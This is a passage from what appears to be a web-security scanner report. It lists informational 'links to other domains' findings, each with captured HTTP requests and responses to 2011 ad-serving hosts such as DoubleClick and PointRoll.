Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 09 May 2011 15:36:09 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 453

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b02/c/58/%2a/r;228460384;1-0;0;50162132;4307-300/250;39961082/39978869/1;;~sscs=%3fhttp://a1.interclick.com/icaid/128531/tid/88285d39-c26a-4993-96e1-8a5d87de37e5/click.ic?http%3a%2f%2fwww.transunion.com/%3Fam%3D2060%26channel%3Dpaid%26cid%3Ddisplay%3A2060"><img src="http://s0.2mdn.net/viewad/2769103/Surprise_300x250_Free2011Score.gif" border=0 alt="Advertisement"></a>
...[SNIP]...

17.8. http://ad.doubleclick.net/adj/invc.macroaxis/widget

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/invc.macroaxis/widget

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain:

Request

GET /adj/invc.macroaxis/widget;kw=;kval=widget;tile=11;sz=88x31;ord=4611983066424727? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://widgets.macroaxis.com/widgets/partnerMarketsIntradaySnap.jsp?gia=t&t=26&s=NYA,IXIC,GSPC
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 09 May 2011 15:37:55 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 520

document.write('<a target="_top" href="http://ad.doubleclick.net/click;h=v8/3b02/0/0/%2a/n;237457143;2-0;0;60882667;21-88/31;41550533/41568320/1;;~aopt=0/ff/22/ff;~fdr=237529654;0-0;0;45421274;21-88/3
...[SNIP]...
95435/41013222/1;;~aopt=3/1/22/0;~sscs=%3fhttp://www.optionshouse.com/landing/rates_compare/?utm_source=invchannel&utm_medium=paid-banner-ads&utm_campaign=88x31-PartnrCtrBttn&utm_content=stock:ohfeat"><img src="http://s0.2mdn.net/viewad/3017628/88x31_ohfeatures_040411_395.gif" border=0 alt="Advertisement"></a>
...[SNIP]...

17.9. http://ads.bridgetrack.com/a/f/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.bridgetrack.com
Path:   /a/f/

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /a/f/?BT_CON=200&BT_PID=1559799&r=1748565961&click=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBjmhuQgrITdiEBbK9sQf_qZXkD4OtlZQCs5_thR3AjbcB0PalBBABGAEggqrzDjgAUJOPk9T6_____wFgyYaFiYikhBCgAb3klNsDsgETd3d3LnRoZXJlcHVibGljLmNvbboBCjMwMHgyNTBfYXPIAQnaASBodHRwOi8vd3d3LnRoZXJlcHVibGljLmNvbS9ob21lL7gCGMgC2_zMH6gDAdEDrGtosNr1JsXoA5ID6AO1KugD6QfoA7Mp6AO7KvUDAAAARA%26num%3D1%26sig%3DAGiWqtx_GS7Yu0kL0iNYahi3Cfl6RiqLbQ%26client%3Dca-pub-8560941387472259%26adurl%3D HTTP/1.1
Host: ads.bridgetrack.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-8560941387472259&output=html&h=250&slotname=8504762554&w=300&lmt=1304973456&flash=10.2.154&url=http%3A%2F%2Fwww.therepublic.com%2Fhome%2F&dt=1304955456815&bpp=48&shv=r20110427&jsv=r20110427&correlator=1304955456958&frm=0&adk=3853240141&ga_vid=434740447.1304955454&ga_sid=1304955454&ga_hid=157227490&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1050&bih=968&ref=http%3A%2F%2Fwww.therepublic.com%2Flogin%2Fprocess%2F&fu=0&ifi=2&dtd=163&xpc=iqVH5Fr9Rv&p=http%3A//www.therepublic.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BTA144=; BTA=GUID=4CEEBF00B4224B529E63931FA8A025A6

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sun, 08 May 2011 15:37:41 GMT
Vary: Accept-Encoding
P3P: CP="NON DSP COR DEVa PSAa IVAo CONo OUR IND UNI PUR NAV DEM LOC", policyref="http://ads.bridgetrack.com/w3c/p3p.xml"
Set-Cookie: ASB164=TX=1304955461&D10=&D6=&D8=&D1=&D3=&Pb=104&A=8&SID=9996D17BE9434FAF86AAA6900B6D6F82&D4=&Vn=1423&Ct=0&Pc=0&D5=&S=&Cn=200&Pd=0&D9=&D2=&T=588064&Cr=71712&D7=&W=72461&Tr=72461&Cp=2248&P=1559799&B=164; expires=Wed, 11-May-2011 04:00:00 GMT; path=/
Set-Cookie: ATV164=15920d163AJLc68c268c1FJ7Nc38c1CFc2610cHU90cc26ODc8ccc26ODcccccccccccccc; expires=Wed, 11-May-2011 04:00:00 GMT; path=/
Set-Cookie: VCC164=; expires=Sat, 01-Jan-2000 05:00:00 GMT; path=/
Set-Cookie: BTASES=SID=89BD0AAD619444D2AFEC01012356111B; path=/
Set-Cookie: BTA=GUID=4CEEBF00B4224B529E63931FA8A025A6; expires=Thu, 03-May-2012 04:00:00 GMT; path=/
Date: Mon, 09 May 2011 15:37:40 GMT
Connection: close
Content-Length: 4022

<script language=Javascript src="/ads_v2/script/btwrite.js"></script>
<SCRIPT LANGUAGE=Javascript>function BTAdClick(szURL){window.open(szURL);};var n=navigator;var h="";var fmnv=5;var fmav=10;var btf
...[SNIP]...
<NOSCRIPT><A HREF="http://googleads.g.doubleclick.net/aclk?sa=l&ai=BjmhuQgrITdiEBbK9sQf_qZXkD4OtlZQCs5_thR3AjbcB0PalBBABGAEggqrzDjgAUJOPk9T6_____wFgyYaFiYikhBCgAb3klNsDsgETd3d3LnRoZXJlcHVibGljLmNvbboBCjMwMHgyNTBfYXPIAQnaASBodHRwOi8vd3d3LnRoZXJlcHVibGljLmNvbS9ob21lL7gCGMgC2_zMH6gDAdEDrGtosNr1JsXoA5ID6AO1KugD6QfoA7Mp6AO7KvUDAAAARA&num=1&sig=AGiWqtx_GS7Yu0kL0iNYahi3Cfl6RiqLbQ&client=ca-pub-8560941387472259&adurl=http%3A%2F%2Fads%2Ebridgetrack%2Ecom%2Fads%5Fv2%2Fimg%5Fclick%2F%3FBT%5FBCID%3D316722%26BT%5FSID%3D98461%26" target="_blank"><IMG WIDTH=300 HEIGHT=250 SRC="http://ads.bridgetrack.com.edgesuite.net/assets/71708/$250_BOLDGREEN_300x250_LCD_LP.jpg" ALT="" BORDER=0></A><img src="http://ad.doubleclick.net/ad/N5762.150143.GOOGLE.COM/B5023054.65;sz=1x1;pc=[TPAS_ID];ord=153807263?" border=0 width=1 height=1 /></NOSCRIPT>
...[SNIP]...

17.10. http://ads.pointroll.com/PortalServe/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain:

Request

GET /PortalServe/?pid=1278427N54020110421174444&flash=10&time=13049554201|10:37|-5&redir=http://va.px.invitemedia.com/pixel%3FreturnType=redirect%26key=Click%26message=eJwtizsOgEAIBa.yobYAHp9dz7SxszLeXUisZiYPHgLoHMGSxyBou6yYUiUV5OwBnsoIW2G8FNSXvaUrZ1e_adF_WvG69y6NUjOX9wMmshRf%26redirectURL=$CTURL$&pos=x&dom=http://optimized-by.rubiconproject.com&r=0.9951261263340712 HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
Referer: http://ib.adnxs.com/acb?member=311&width=728&height=90&pb=280&cb=2507990&referrer=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRID=B313D3CD-2147-4ACC-A03C-CCA65D06F94D; PRbu=EoSNMBpPq; PRsl=11042210442417319321424330526S; PRvt=CGJBaEoSNMBpPqAI5BBeJUpEoeWZPXI2ARGCAeJo2Eonlg6HlnAEZCAeJozEon0qBOtv!FLBCeJpJEothAYwPFAxsCAeJjUEotmZjrmKAEcCDe; PRgo=BCBAAsJvCAAuILDBF-19!BCVBF4FRDVCFUE6; PRimp=D9A20400-8E99-8AB9-0309-8D40011C0203; PRca=|AKLC*1774:2|AKTy*9203:1|AKRD*2017:1|AKQh*130:2|AKQf*282:294|AKTa*130:1|AKVY*127:1|AKQk*1753:10|AKPE*832:2|AKN6*527:2|AJvt*77:1|AKDp*36:2|AKOh*27:1|AKRt*47:2|AKOA*1753:1|AJsL*1753:1|AKGw*2017:1|AJvr*1753:1|AKLp*1753:2|AJcC*23172:1|#; PRcp=|AKLCAA2c:2|AKTyACY1:1|AKRDAA67:1|AKQhAACG:2|AKQfAAE8:294|AKTaAACG:1|AKQkAFiH:1|AKVYAACD:1|AKQkAFx5:2|AKQkAA2R:7|AKPEAAN0:2|AKN6AAI5:2|AJvtAABP:1|AKDpAAAa:2|AKOhAAA1:1|AKRtAAAl:2|AKOAAA2R:1|AJsLAA2R:1|AKGwAA67:1|AJvrAA2R:1|AKLpAA2R:2|AJcCAGBk:1|#; PRpl=|FKqE:2|FWcL:1|FZsH:1|FYnl:1|FYnm:1|FVn1:58|FVnS:59|FVnT:59|FVnV:59|FVnU:59|FWau:1|FW9s:1|FW9l:1|FY3g:1|FW9r:1|FW9T:3|FW9U:4|FOLx:1|FOLw:1|FPoF:2|Eviz:1|FLXe:1|FLW9:1|FODi:1|FUZr:2|FOn5:1|Etxz:1|FO2m:1|FCbK:1|FPLN:2|Eoxl:1|#; PRcr=|GKwo:2|GLLp:1|GMjB:1|GMEZ:1|GMEa:1|GLEi:58|GLEl:59|GLEo:59|GLEp:59|GLEm:59|GKw2:1|GMGQ:1|GLZC:1|GLZE:4|GLZD:3|GLZB:2|GJTv:1|GJTs:1|GKTE:1|GKTL:1|FzvF:1|GHhF:2|GJQB:1|GKwB:1|GKvy:1|GJsu:1|GA7A:1|GKDl:1|GJij:1|GDVY:1|GKCp:1|Fy9A:1|#; PRpc=|FKqEGKwo:2|FWcLGLLp:1|FZsHGMjB:1|FYnlGMEZ:1|FYnmGMEa:1|FVn1GLEi:58|FVnSGLEl:59|FVnTGLEo:59|FVnVGLEp:59|FVnUGLEm:59|FWauGKw2:1|FW9sGLZE:1|FW9lGLZE:1|FY3gGMGQ:1|FW9rGLZC:1|FW9UGLZE:2|FW9TGLZD:3|FW9UGLZB:2|FOLxGJTv:1|FOLwGJTs:1|FPoFGKTE:1|FPoFGKTL:1|EvizFzvF:1|FLXeGHhF:1|FLW9GHhF:1|FODiGJQB:1|FUZrGKwB:1|FUZrGKvy:1|FOn5GJsu:1|EtxzGA7A:1|FPLNGKDl:1|FO2mGJij:1|FCbKGDVY:1|FPLNGKCp:1|EoxlFy9A:1|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 09 May 2011 15:37:10 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Cache-Control: no-cache
Content-type: text/html
Content-length: 1999
Set-Cookie:PRvt=CGJBaEoSNMBpPqAI5BBeJUpEoeWZPXI2ARGCAeJo2Eotmc42r-AEECAeJozEon0qBOtv!FLBCeJpJEothAYwPFAxsCAeJjUEotmZjrmKAEcCDe;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRgo=BCBAAsJvCAAuILDBF-19!BCVBF4FRDVCFUE6;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRimp=D9A20400-E39C-FF6A-0309-A36001040200; domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRca=|AKLC*1774:2|AKTy*9203:1|AKRD*2017:1|AKQh*130:2|AKQf*282:294|AKTa*130:1|AKVY*127:1|AKQk*1753:11|AKPE*832:2|AKN6*527:2|AJvt*77:1|AKDp*36:2|AKOh*27:1|AKRt*47:2|AKOA*1753:1|AJsL*1753:1|AKGw*2017:1|AJvr*1753:1|AKLp*1753:2|AJcC*23172:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcp=|AKLCAA2c:2|AKTyACY1:1|AKRDAA67:1|AKQhAACG:2|AKQfAAE8:294|AKTaAACG:1|AKQkAFiH:2|AKVYAACD:1|AKQkAFx5:2|AKQkAA2R:7|AKPEAAN0:2|AKN6AAI5:2|AJvtAABP:1|AKDpAAAa:2|AKOhAAA1:1|AKRtAAAl:2|AKOAAA2R:1|AJsLAA2R:1|AKGwAA67:1|AJvrAA2R:1|AKLpAA2R:2|AJcCAGBk:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpl=|FW9n:1|FKqE:2|FWcL:1|FZsH:1|FYnl:1|FYnm:1|FVn1:58|FVnS:59|FVnT:59|FVnV:59|FVnU:59|FWau:1|FW9s:1|FW9l:1|FY3g:1|FW9r:1|FW9T:3|FW9U:4|FOLx:1|FOLw:1|FPoF:2|Eviz:1|FLXe:1|FLW9:1|FODi:1|FUZr:2|FOn5:1|Etxz:1|FO2m:1|FCbK:1|FPLN:2|Eoxl:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcr=|GKwo:2|GLLp:1|GMjB:1|GMEZ:1|GMEa:1|GLEi:58|GLEl:59|GLEo:59|GLEp:59|GLEm:59|GKw2:1|GMGQ:1|GLZC:2|GLZE:4|GLZD:3|GLZB:2|GJTv:1|GJTs:1|GKTE:1|GKTL:1|FzvF:1|GHhF:2|GJQB:1|GKwB:1|GKvy:1|GJsu:1|GA7A:1|GKDl:1|GJij:1|GDVY:1|GKCp:1|Fy9A:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpc=|FW9nGLZC:1|FKqEGKwo:2|FWcLGLLp:1|FZsHGMjB:1|FYnlGMEZ:1|FYnmGMEa:1|FVn1GLEi:58|FVnSGLEl:59|FVnTGLEo:59|FVnVGLEp:59|FVnUGLEm:59|FWauGKw2:1|FW9sGLZE:1|FW9lGLZE:1|FY3gGMGQ:1|FW9rGLZC:1|FW9UGLZE:2|FW9TGLZD:3|FW9UGLZB:2|FOLxGJTv:1|FOLwGJTs:1|FPoFGKTE:1|FPoFGKTL:1|EvizFzvF:1|FLXeGHhF:1|FLW9GHhF:1|FODiGJQB:1|FUZrGKwB:1|FUZrGKvy:1|FOn5GJsu:1|EtxzGA7A:1|FPLNGKDl:1|FO2mGJij:1|FCbKGDVY:1|FPLNGKCp:1|EoxlFy9A:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;

var prwin=window;if(!prwin.prRefs){prwin.prRefs={};};prwin.prSet=function(n,v){if((typeof(n)!='undefined')&&(typeof(v)!='undefined')){prwin.prRefs[n]=v;}};prwin.prGet=function(n){if(typeof(prwin.prRef
...[SNIP]...
</style><a target='_blank' href='http://va.px.invitemedia.com/pixel?returnType=redirect&key=Click&message=eJwtizsOgEAIBa.yobYAHp9dz7SxszLeXUisZiYPHgLoHMGSxyBou6yYUiUV5OwBnsoIW2G8FNSXvaUrZ1e_adF_WvG69y6NUjOX9wMmshRf&redirectURL=http://clk.pointroll.com/bc/?a=1473804&c=1&i=D9A20400-E39C-FF6A-0309-A36001040200&clickurl=http://www.playtexbramakeover.com/'><img border=0 width='728' height='90' style='width:728px;height:90px' src='http://speed.pointroll.com/PointRoll/Media/Banners/Hanes/863118/PTX_728x90_BF.jpg?PRAd=1473804&PRCID=1473804&PRplcmt=1278427&P
...[SNIP]...

17.11. http://ads.pointroll.com/PortalServe/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain:

Request

GET /PortalServe/?pid=1233308J95620110310212114&flash=10&time=1|10:35|-5&redir=http://adclick.g.doubleclick.net/aclk%3Fsa%3DL%26ai%3DBEgMLqgnITYDyDaXRlQfxr83UCKTwo_oBvMa13hvAjbcBABABGAEgjfDlBTgAYMmGhYmIpIQQsgERd3d3LmNzbW9uaXRvci5jb226AQozMDB4MjUwX2FzyAEJ2gEhaHR0cDovL3d3dy5jc21vbml0b3IuY29tL0J1c2luZXNz4AEFmALADLgCGMgC5In4GeACAOoCDjMwMHgyNTBCX01vbmV5kAOkA5gD4AOoAwHoA2voA5MF6AOYA-gDiwnoA4wJ9QMCBABE9QMgAAAA4AQB%26num%3D1%26sig%3DAGiWqtyodj_3eco2oOZOH11No0LN9ZNq6g%26client%3Dca-pub-6743622525202572%26adurl%3D$CTURL$&r=0.18015406071208417 HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRID=B313D3CD-2147-4ACC-A03C-CCA65D06F94D; PRbu=EoSNMBpPq; PRsl=11042210442417319321424330526S; PRvt=CFJBaEoSNMBpPqAI5BBeJUpEoeWZPXI2ARGCAeJo2Eonlg6HlnAEZCAeJozEon0qBOtv!FLBCeJpJEothAYwPFAxsCAe; PRgo=BCBAAsJvCAAuILCBF-19!BCVBF4FR; PRimp=D9A20400-8E82-28EE-0209-AFE0003E0200; PRca=|AKTy*9203:1|AKRD*2017:1|AKQh*130:2|AKQf*282:294|AKTa*130:1|AKVY*127:1|AKQk*1753:10|AKPE*832:2|AKN6*527:2|AJvt*77:1|AKDp*36:2|AKOh*27:1|AKRt*47:2|AKOA*1753:1|AJsL*1753:1|AKGw*2017:1|AJvr*1753:1|AKLp*1753:2|AJcC*23172:1|#; PRcp=|AKTyACY1:1|AKRDAA67:1|AKQhAACG:2|AKQfAAE8:294|AKTaAACG:1|AKQkAFiH:1|AKVYAACD:1|AKQkAFx5:2|AKQkAA2R:7|AKPEAAN0:2|AKN6AAI5:2|AJvtAABP:1|AKDpAAAa:2|AKOhAAA1:1|AKRtAAAl:2|AKOAAA2R:1|AJsLAA2R:1|AKGwAA67:1|AJvrAA2R:1|AKLpAA2R:2|AJcCAGBk:1|#; PRpl=|FWcL:1|FZsH:1|FYnl:1|FYnm:1|FVn1:58|FVnS:59|FVnT:59|FVnV:59|FVnU:59|FWau:1|FW9s:1|FW9l:1|FY3g:1|FW9r:1|FW9T:3|FW9U:4|FOLx:1|FOLw:1|FPoF:2|Eviz:1|FLXe:1|FLW9:1|FODi:1|FUZr:2|FOn5:1|Etxz:1|FO2m:1|FCbK:1|FPLN:2|Eoxl:1|#; PRcr=|GLLp:1|GMjB:1|GMEZ:1|GMEa:1|GLEi:58|GLEl:59|GLEo:59|GLEp:59|GLEm:59|GKw2:1|GMGQ:1|GLZC:1|GLZE:4|GLZD:3|GLZB:2|GJTv:1|GJTs:1|GKTE:1|GKTL:1|FzvF:1|GHhF:2|GJQB:1|GKwB:1|GKvy:1|GJsu:1|GA7A:1|GKDl:1|GJij:1|GDVY:1|GKCp:1|Fy9A:1|#; PRpc=|FWcLGLLp:1|FZsHGMjB:1|FYnlGMEZ:1|FYnmGMEa:1|FVn1GLEi:58|FVnSGLEl:59|FVnTGLEo:59|FVnVGLEp:59|FVnUGLEm:59|FWauGKw2:1|FW9sGLZE:1|FW9lGLZE:1|FY3gGMGQ:1|FW9rGLZC:1|FW9UGLZE:2|FW9TGLZD:3|FW9UGLZB:2|FOLxGJTv:1|FOLwGJTs:1|FPoFGKTE:1|FPoFGKTL:1|EvizFzvF:1|FLXeGHhF:1|FLW9GHhF:1|FODiGJQB:1|FUZrGKwB:1|FUZrGKvy:1|FOn5GJsu:1|EtxzGA7A:1|FPLNGKDl:1|FO2mGJij:1|FCbKGDVY:1|FPLNGKCp:1|EoxlFy9A:1|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 09 May 2011 15:35:08 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Cache-Control: no-cache
Content-type: text/html
Content-length: 4400
Set-Cookie:PRvt=CGJBaEoSNMBpPqAI5BBeJUpEoeWZPXI2ARGCAeJo2Eonlg6HlnAEZCAeJozEon0qBOtv!FLBCeJpJEothAYwPFAxsCAeJjUEotmVlODIAEcCDe;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRgo=BCBAAsJvCAAuILDBF-19!BCVBF4FRDVCFUE6;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRimp=D9A20400-9495-C8E0-0309-8D40011C0203; domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRca=|AKLC*1774:1|AKTy*9203:1|AKRD*2017:1|AKQh*130:2|AKQf*282:294|AKTa*130:1|AKVY*127:1|AKQk*1753:10|AKPE*832:2|AKN6*527:2|AJvt*77:1|AKDp*36:2|AKOh*27:1|AKRt*47:2|AKOA*1753:1|AJsL*1753:1|AKGw*2017:1|AJvr*1753:1|AKLp*1753:2|AJcC*23172:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcp=|AKLCAA2c:1|AKTyACY1:1|AKRDAA67:1|AKQhAACG:2|AKQfAAE8:294|AKTaAACG:1|AKQkAFiH:1|AKVYAACD:1|AKQkAFx5:2|AKQkAA2R:7|AKPEAAN0:2|AKN6AAI5:2|AJvtAABP:1|AKDpAAAa:2|AKOhAAA1:1|AKRtAAAl:2|AKOAAA2R:1|AJsLAA2R:1|AKGwAA67:1|AJvrAA2R:1|AKLpAA2R:2|AJcCAGBk:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpl=|FKqE:1|FWcL:1|FZsH:1|FYnl:1|FYnm:1|FVn1:58|FVnS:59|FVnT:59|FVnV:59|FVnU:59|FWau:1|FW9s:1|FW9l:1|FY3g:1|FW9r:1|FW9T:3|FW9U:4|FOLx:1|FOLw:1|FPoF:2|Eviz:1|FLXe:1|FLW9:1|FODi:1|FUZr:2|FOn5:1|Etxz:1|FO2m:1|FCbK:1|FPLN:2|Eoxl:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcr=|GKwo:1|GLLp:1|GMjB:1|GMEZ:1|GMEa:1|GLEi:58|GLEl:59|GLEo:59|GLEp:59|GLEm:59|GKw2:1|GMGQ:1|GLZC:1|GLZE:4|GLZD:3|GLZB:2|GJTv:1|GJTs:1|GKTE:1|GKTL:1|FzvF:1|GHhF:2|GJQB:1|GKwB:1|GKvy:1|GJsu:1|GA7A:1|GKDl:1|GJij:1|GDVY:1|GKCp:1|Fy9A:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpc=|FKqEGKwo:1|FWcLGLLp:1|FZsHGMjB:1|FYnlGMEZ:1|FYnmGMEa:1|FVn1GLEi:58|FVnSGLEl:59|FVnTGLEo:59|FVnVGLEp:59|FVnUGLEm:59|FWauGKw2:1|FW9sGLZE:1|FW9lGLZE:1|FY3gGMGQ:1|FW9rGLZC:1|FW9UGLZE:2|FW9TGLZD:3|FW9UGLZB:2|FOLxGJTv:1|FOLwGJTs:1|FPoFGKTE:1|FPoFGKTL:1|EvizFzvF:1|FLXeGHhF:1|FLW9GHhF:1|FODiGJQB:1|FUZrGKwB:1|FUZrGKvy:1|FOn5GJsu:1|EtxzGA7A:1|FPLNGKDl:1|FO2mGJij:1|FCbKGDVY:1|FPLNGKCp:1|EoxlFy9A:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;

var prwin=window;if(!prwin.prRefs){prwin.prRefs={};};prwin.prSet=function(n,v){if((typeof(n)!='undefined')&&(typeof(v)!='undefined')){prwin.prRefs[n]=v;}};prwin.prGet=function(n){if(typeof(prwin.prRef
...[SNIP]...
</style><a target='_blank' href='http://adclick.g.doubleclick.net/aclk?sa=L&ai=BEgMLqgnITYDyDaXRlQfxr83UCKTwo_oBvMa13hvAjbcBABABGAEgjfDlBTgAYMmGhYmIpIQQsgERd3d3LmNzbW9uaXRvci5jb226AQozMDB4MjUwX2FzyAEJ2gEhaHR0cDovL3d3dy5jc21vbml0b3IuY29tL0J1c2luZXNz4AEFmALADLgCGMgC5In4GeACAOoCDjMwMHgyNTBCX01vbmV5kAOkA5gD4AOoAwHoA2voA5MF6AOYA-gDiwnoA4wJ9QMCBABE9QMgAAAA4AQB&num=1&sig=AGiWqtyodj_3eco2oOZOH11No0LN9ZNq6g&client=ca-pub-6743622525202572&adurl=http://clk.pointroll.com/bc/?a=1472054&c=1&i=D9A20400-9495-C8E0-0309-8D40011C0203&clickurl=http://ad.doubleclick.net/click%3Bh=v2%7C3DC0%7C0%7C0%7C%252a%7Cd%3B239992381%3B0-0%3B0%3B60927427%3B31-1%7C1%3B41081340%7C41099127%7C1%3B%3B%253fhttp://www.ford.com/commercial-trucks/%3Fbannerid=691050%7C60927427%7C239992381%7C0%26referrer=N3106.GoogleContentNetwork'><img border=0 width='300' height='250' style='width:300px;height:250px' src='http://speed.pointroll.com/PointRoll/Media/Banners/Ford/861911/CommTruck_Season_2010_300x250_DFLT_101410.jpg?PRAd=1472054&PR
...[SNIP]...

17.12. http://ads.pointroll.com/PortalServe/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain:

Request

GET /PortalServe/?pid=1233308J95620110310212114&flash=10&time=1|10:36|-5&redir=http://adclick.g.doubleclick.net/aclk%3Fsa%3DL%26ai%3DBIxur6wnITYvYL8G6lQfEiM2BDqTwo_oBvMa13hvAjbcBABABGAEgjfDlBTgAYMmGhYmIpIQQsgERd3d3LmNzbW9uaXRvci5jb226AQozMDB4MjUwX2FzyAEJ2gEhaHR0cDovL3d3dy5jc21vbml0b3IuY29tL0J1c2luZXNz4AEGmALADLgCGMgC5In4GeACAOoCEDMwMHgyNTBDX0dlbmVyYWyQA6QDmAPgA6gDAegDa-gDkwXoA5gD6AOLCegDjAn1AwIEAET1AyAAAADgBAE%26num%3D1%26sig%3DAGiWqtwblKQkvKvYR7-meTWiSF-YSMCUiw%26client%3Dca-pub-6743622525202572%26adurl%3D$CTURL$&r=0.9906379778403789 HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
